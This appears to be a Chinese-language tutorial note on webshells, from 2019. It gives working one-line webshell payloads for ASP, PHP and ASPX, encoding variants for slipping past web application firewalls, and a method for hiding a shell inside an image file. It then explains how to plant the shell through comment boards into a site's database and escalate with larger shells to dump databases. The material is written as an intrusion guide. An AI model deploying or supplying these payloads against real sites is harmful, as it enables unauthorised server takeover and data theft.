大綱:webshell制作與原理
webshell使用技巧
webshell“黑吃黑”
webshell制作原理
webshell種類
一句話木馬(使用的最多)、小馬、大馬、打包馬、脫褲馬、、、
一句話木馬
介紹:短小精悍,並且功能強大、隱蔽性非常好,在入侵種始終扮演着非常重要的角色
e.g:<%execute request("value")%>
解釋:
execute:是一個執行函數,用來執行該命令
request:是接收提交方式,可接受post型、get型、cookie型的傳參
value:是參數,也是我們用菜刀連接時的密碼
http://www.xx.com/x.asp?value= 以這種方式接收命令
用菜刀連接時如下:
常見寫法:
asp一句話:
<%eval request("pv")%>
PHP一句話:
<?php eval($_POST[a])?>
aspx一句話:
<%@ Page Language="Jscript"%><%eval(Request.Item["mima"],"unsafe");%>
jsp一句話:(也是一種小馬)
一句話木馬的變形(為了繞過waf)
<?php $_REQUEST['a']($_REQUEST['b']);?> 這種方式已經淘汰了用不了了
這個語句中沒有執行函數,只有兩個接收函數,使用的時候對參數a傳遞執行函數 /x.php?a=eval 然后再用菜刀連接
<%Eval((Request(char(112))))%>
用ascii碼轉碼,不再使用單引號、雙引號,防止閉合
<%eval(eval(char(114)+char(101)+char(113)+char(117)+char(101)+char(115)+char(116)("xindong")%>
用ascii碼轉碼,不再使用單引號、雙引號,防止閉合(asp用+號連接,php用.號連接)
<%a=request("gold")%><%eval a%>
一句話圖片馬制作(隱寫,建議使用搭建網站的素材圖片)
c32或winhex做一句話
用該軟件打開圖片,講一句話代碼放在最后面保存
cmd下做一句話
copy /d 1.jpg+1.asp 2.jpg 不建議
也可以在圖片屬性中的詳細信息中添加一句話(版權中)
常見的一句話客戶端
一句話客戶端增強版
中國菜刀 右后門 菜刀上傳大馬1,再刪除菜刀碼,大馬1上傳大馬2,刪除大馬1,要脫三次
中國砍刀
lanker一句話客戶端
zv新型PHP一句話客戶端GUI版
小馬
體積小,易隱蔽,最重要的是與圖片結合在一起上傳后可以利用nginx或者iis6的解析漏洞來運行,不過功能少,一般只用來上傳大馬
大馬
體積大,50K大小左右,功能多,一般包括提權命令,磁盤管理,數據庫連接接口,執行命令甚至有些具備自帶的提權功能和壓縮,解壓縮網站程序功能,隱蔽性不好,而且大多數代碼不加密或被查殺。
一句話的使用
首先,找到數據庫是asp格式的網站,然后,以留言板或者發表文章的方式,把一句話添加到數據庫,或者網頁。我們的目的是把一句話添加到數據庫,無論任何方式。然后菜刀連接。
小馬使用
主要用來上傳大馬
大馬使用
提權、打包、脫褲、增刪文件、、、
使用技巧
內容編碼、配合解析漏洞、配合文件包含、利用文件名溢出
文件包含代碼,放在b.asp
<!--#include file="conn.asp"-->
conn.asp 就是要包含的文件
使用的時候直接訪問b.asp,就會加載conn.asp文件
webshell“黑吃黑”
找shell后門
查找后門、查找webshell后門、找到后門地址、返搞webshell箱子
2019-05-10 14:23:44